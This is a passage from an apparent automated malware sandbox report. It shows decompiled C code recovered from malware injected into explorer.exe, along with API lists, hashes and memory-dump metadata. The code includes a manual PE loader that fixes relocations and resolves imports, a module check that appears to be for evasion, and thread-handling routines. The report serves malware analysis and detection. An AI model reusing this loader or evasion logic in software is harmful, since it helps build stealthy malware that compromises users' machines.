											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1);
														E0008861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0x293f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0x293f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}


















































































                  0x00084d6d
                  0x00084d73
                  0x00084d79
                  0x00084d7e
                  0x00084d8c
                  0x00084d8f
                  0x00084dee
                  0x00084e00
                  0x00084e03
                  0x00084e0a
                  0x00084e0f
                  0x00084e14
                  0x00084e1b
                  0x00084e25
                  0x00084e2c
                  0x00084e37
                  0x00084e3c
                  0x00084e43
                  0x00084e49
                  0x00084e4b
                  0x00084e4c
                  0x00084e50
                  0x00084e5b
                  0x00084e60
                  0x00084e69
                  0x00084e6e
                  0x00084e76
                  0x00084e7d
                  0x00084e7e
                  0x00084e80
                  0x00084e9c
                  0x00084e9f
                  0x00084e9f
                  0x00084ea8
                  0x00084ead
                  0x00084ebd
                  0x00084ec5
                  0x00084eca
                  0x00084ed0
                  0x00084ed3
                  0x00084ed9
                  0x00084ef8
                  0x00084efe
                  0x00084eff
                  0x00084f00
                  0x00084f01
                  0x00084f02
                  0x00084f03
                  0x00084f0d
                  0x00084f11
                  0x00084f16
                  0x00084f19
                  0x00084f1b
                  0x00084f2d
                  0x00084f2d
                  0x00084f2f
                  0x00084f3b
                  0x00084f40
                  0x00084f46
                  0x00084f4f
                  0x00084f52
                  0x00084f54
                  0x00084f5f
                  0x00084f64
                  0x00084f69
                  0x00084f6e
                  0x00084f6e
                  0x00084f71
                  0x00084f78
                  0x00000000
                  0x00084f7e
                  0x00084f7e
                  0x00084f83
                  0x00084f87
                  0x00084f89
                  0x00084f8c
                  0x00084f8e
                  0x00084f94
                  0x00084f94
                  0x00084f8e
                  0x00084f96
                  0x00084f9b
                  0x00084fa1
                  0x00084fa3
                  0x00000000
                  0x00084fa9
                  0x00084fa9
                  0x00084fad
                  0x00085082
                  0x00085088
                  0x0008508e
                  0x00085099
                  0x0008509a
                  0x0008509b
                  0x0008509c
                  0x000850a2
                  0x000850a7
                  0x000850ad
                  0x000850b5
                  0x000850bb
                  0x000850be
                  0x000850cd
                  0x000850d4
                  0x000850d7
                  0x000850e4
                  0x000850e8
                  0x000850f5
                  0x000850fa
                  0x000850fd
                  0x000850ff
                  0x00085110
                  0x00085112
                  0x00085116
                  0x00085117
                  0x00085119
                  0x00085124
                  0x00085129
                  0x00085136
                  0x0008513a
                  0x0008513b
                  0x0008513d
                  0x00085145
                  0x00085146
                  0x0008514b
                  0x00085163
                  0x00085168
                  0x0008516b
                  0x0008516f
                  0x00085171
                  0x00085184
                  0x0008518e
                  0x00085192
                  0x0008519a
                  0x0008519b
                  0x000851a3
                  0x000851a4
                  0x000851a9
                  0x000851b5
                  0x000851bf
                  0x000851d1
                  0x000851dd
                  0x000851e2
                  0x000851e2
                  0x000851ec
                  0x000851f2
                  0x000851f2
                  0x00085119
                  0x000850ff
                  0x00000000
                  0x00085088
                  0x00084fb3
                  0x00084fb6
                  0x00000000
                  0x00000000
                  0x00084fbc
                  0x00084fc7
                  0x00084fc8
                  0x00084fc9
                  0x00084fca
                  0x00084fd0
                  0x00084fd5
                  0x00084fe9
                  0x00084fee
                  0x00084ff2
                  0x00084ffd
                  0x00085006
                  0x00085008
                  0x0008500c
                  0x0008500d
                  0x0008500f
                  0x0008501a
                  0x00085020
                  0x00085032
                  0x00085035
                  0x00085038
                  0x00085045
                  0x0008504d
                  0x00085057
                  0x00085069
                  0x00085075
                  0x0008507a
                  0x00000000
                  0x0008500f
                  0x00084fa3
                  0x00084edb
                  0x00084edb
                  0x00084ee1
                  0x00084ee3
                  0x00000000
                  0x00000000
                  0x00084ee5
                  0x00084ee9
                  0x000851f3
                  0x000851f8
                  0x000851fe
                  0x00085200
                  0x00085201
                  0x00085205
                  0x00085215
                  0x0008521a
                  0x0008521e
                  0x00085220
                  0x00085224
                  0x00085229
                  0x0008522b
                  0x0008522d
                  0x00085233
                  0x00085233
                  0x00085240
                  0x00085246
                  0x0008524c
                  0x00085251
                  0x0008526f
                  0x00085271
                  0x0008527d
                  0x0008527d
                  0x00085283
                  0x00085285
                  0x0008528b
                  0x0008529d
                  0x000852a3
                  0x000852af
                  0x000852b7
                  0x000852b7
                  0x000852b7
                  0x000852b9
                  0x000852bf
                  0x000852bf
                  0x00084eef
                  0x00084ef2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00084ef2
                  0x00084ed9
                  0x00084e1d
                  0x00084e1d
                  0x00000000
                  0x00084e1d
                  0x00084d9b
                  0x00084da2
                  0x00084dab
                  0x00084dad
                  0x00084db3
                  0x00084dc4
                  0x00084dcd
                  0x00084dcd
                  0x00084dd9
                  0x00084de2
                  0x00084de7
                  0x00084dec
                  0x00000000
                  0x00000000
                  0x00084dec

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                  • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                  • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleModulelstrcpyn
                  • String ID:
                  • API String ID: 3430401031-0
                  • Opcode ID: 3c327dc972dc27ac34c8bcfc415fed6bdfd7d0c2be9df9a58538f6eb7eb5bbf5
                  • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                  • Opcode Fuzzy Hash: 3c327dc972dc27ac34c8bcfc415fed6bdfd7d0c2be9df9a58538f6eb7eb5bbf5
                  • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 52%
                  			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                  0x00092afb
                  0x00092b01
                  0x00092b0a
                  0x00092b0d
                  0x00092b10
                  0x00000000
                  0x00092c01
                  0x00092c05
                  0x00092c07
                  0x00092c15
                  0x00092d33
                  0x00092d3c
                  0x00092d3f
                  0x00092d43
                  0x00092d49
                  0x00092d51
                  0x00092d51
                  0x00092d59
                  0x00000000
                  0x00092d64
                  0x00092c1b
                  0x00092c24
                  0x00092c32
                  0x00092c35
                  0x00092c52
                  0x00092c59
                  0x00092c6b
                  0x00092c6b
                  0x00092c72
                  0x00092c82
                  0x00092c9a
                  0x00092c84
                  0x00092c8c
                  0x00092c8c
                  0x00092c9d
                  0x00092ca1
                  0x00092cb1
                  0x00092cd4
                  0x00092ce6
                  0x00092cb3
                  0x00092cc7
                  0x00092cc7
                  0x00092cf0
                  0x00092d0c
                  0x00092cf2
                  0x00092d01
                  0x00092d01
                  0x00092d14
                  0x00092d1d
                  0x00092d1d
                  0x00092d2b
                  0x00000000
                  0x00092c74
                  0x00092c76
                  0x00000000
                  0x00092c76
                  0x00092c72
                  0x00000000
                  0x00092c35
                  0x00092b18
                  0x00092b26
                  0x00092b2b
                  0x00092b36
                  0x00092b39
                  0x00092b3d
                  0x00092b3f
                  0x00092b4f
                  0x00092b58
                  0x00092b61
                  0x00092b69
                  0x00092b72
                  0x00092b7d
                  0x00092b83
                  0x00092b86
                  0x00092b89
                  0x00092b90
                  0x00092b97
                  0x00000000
                  0x00000000
                  0x00092ba2
                  0x00092bb0
                  0x00092bbb
                  0x00092bc5
                  0x00092bdd
                  0x00092bea
                  0x00092bea
                  0x00092bc7
                  0x00092bd2
                  0x00092bd2
                  0x00092bf1
                  0x00092bf1
                  0x00092bf9
                  0x00092bf9
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                  • LoadLibraryA.KERNEL32(?), ref: 00092C65
                  • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 384173800-0
                  • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                  • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x0
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0x293f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0x293f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x0
						__eflags = 0;
						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0x0
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0x293f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x0
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                  0x00081c68
                  0x00081c75
                  0x00081c77
                  0x00081c7e
                  0x00081ce4
                  0x00081c8b
                  0x00081c90
                  0x00081c96
                  0x00081c9b
                  0x00081ca1
                  0x00081ca3
                  0x00081ca7
                  0x00081d15
                  0x00081d17
                  0x00081d99
                  0x00081d9f
                  0x00081d9f
                  0x00081ca9
                  0x00081cb1
                  0x00081cb1
                  0x00081cbd
                  0x00081cc3
                  0x00081cc5
                  0x00000000
                  0x00000000
                  0x00081cc7
                  0x00081cd1
                  0x00081cd7
                  0x00081cdd
                  0x00081cdf
                  0x00000000
                  0x00081cdf
                  0x00081cab
                  0x00081caf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00081caf
                  0x00081cee
                  0x00081cef
                  0x00081cf0
                  0x00081cf1
                  0x00081cf2
                  0x00081cf7
                  0x00081d01
                  0x00081d06
                  0x00081d0e
                  0x00081d29
                  0x00081d2c
                  0x00081d36
                  0x00081d41
                  0x00081d54
                  0x00081d56
                  0x00081d58
                  0x00081d5a
                  0x00081d5b
                  0x00081d63
                  0x00081d64
                  0x00081d6a
                  0x00081d10
                  0x00081d10
                  0x00081d10
                  0x00081d6b
                  0x00081d76
                  0x00081d79
                  0x00081d7f
                  0x00081d85
                  0x00081d90
                  0x00081d97
                  0x00000000

                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cef3a4d28e3be0b82092db3b14ebb9ad06c50a558e835dc08a0c3f29a3390bca
                  • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                  • Opcode Fuzzy Hash: cef3a4d28e3be0b82092db3b14ebb9ad06c50a558e835dc08a0c3f29a3390bca
                  • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x0
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0x293f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0x293f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x0
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0x0
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0x293f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x0
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























                  0x00081b2d
                  0x00081b33
                  0x00081b41
                  0x00081baf
                  0x00081b4e
                  0x00081b53
                  0x00081b59
                  0x00081b5e
                  0x00081b64
                  0x00081b66
                  0x00081b6a
                  0x00081c64
                  0x00081c64
                  0x00081b70
                  0x00081b70
                  0x00081b7c
                  0x00081b7c
                  0x00081b88
                  0x00081b8e
                  0x00081b90
                  0x00000000
                  0x00081b92
                  0x00081b92
                  0x00081b9c
                  0x00081ba2
                  0x00081ba8
                  0x00081baa
                  0x00000000
                  0x00081baa
                  0x00081b72
                  0x00081b72
                  0x00081b76
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00081b76
                  0x00081b70
                  0x00081c5d
                  0x00081c63
                  0x00081c63
                  0x00081bb8
                  0x00081bcc
                  0x00081bcf
                  0x00081bd9
                  0x00081be5
                  0x00081bef
                  0x00081bf0
                  0x00081bf1
                  0x00081bf2
                  0x00081bf7
                  0x00081c00
                  0x00081c04
                  0x00081c06
                  0x00081c07
                  0x00081c0f
                  0x00081c10
                  0x00081c16
                  0x00081c1b
                  0x00081c21
                  0x00081c21
                  0x00081c26
                  0x00081c31
                  0x00081c34
                  0x00081c3c
                  0x00081c48
                  0x00081c4b
                  0x00081c51
                  0x00081c56
                  0x00081c5b
                  0x00000000

                  APIs
                  • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                  • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                  • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                  • DuplicateHandle.KERNEL32 ref: 00081BD9
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Current$Process$DuplicateHandleThread
                  • String ID:
                  • API String ID: 3566409357-0
                  • Opcode ID: 2b104535f768232c2eb60f4591d1ea5aaf0333a9885dded86699bdb0ae67a6b5
                  • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                  • Opcode Fuzzy Hash: 2b104535f768232c2eb60f4591d1ea5aaf0333a9885dded86699bdb0ae67a6b5
                  • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B7A8, Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0008B7A8(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v12;
				char _v16;
				short _v528;
				char _v1040;
				char _v1552;
				intOrPtr _t23;
				char _t27;
				intOrPtr _t28;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x9e684; // 0x293f8f0
				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t28 =  *0x9e684; // 0x293f8f0
				_t29 =  *((intOrPtr*)(_t28 + 0x68))(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}

















                  0x0008b7a8
                  0x0008b7b1
                  0x0008b7bd
                  0x0008b7c3
                  0x0008b7c5
                  0x0008b7cd
                  0x0008b7db
                  0x0008b7e0
                  0x0008b7ef
                  0x0008b7fa
                  0x0008b807
                  0x0008b81c
                  0x0008b821
                  0x0008b826
                  0x0008b828
                  0x0008b82f
                  0x0008b83f
                  0x0008b850
                  0x0008b85a
                  0x0008b862
                  0x0008b869
                  0x0008b86c
                  0x0008b889

                  APIs
                  • memset.MSVCRT ref: 0008B7C5
                  • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                    • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                  • lstrcatW.KERNEL32 ref: 0008B85A
                  • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: BuffCharUpper_vsnwprintflstrcatlstrcpynmemset
                  • String ID:
                  • API String ID: 1024327890-0
                  • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                  • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Analysis Process: regsvr32.exe PID: 2212 Parent PID: 2524 regsvr32.exeCOMMON

                  Executed Functions

                  Function 1007792E, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
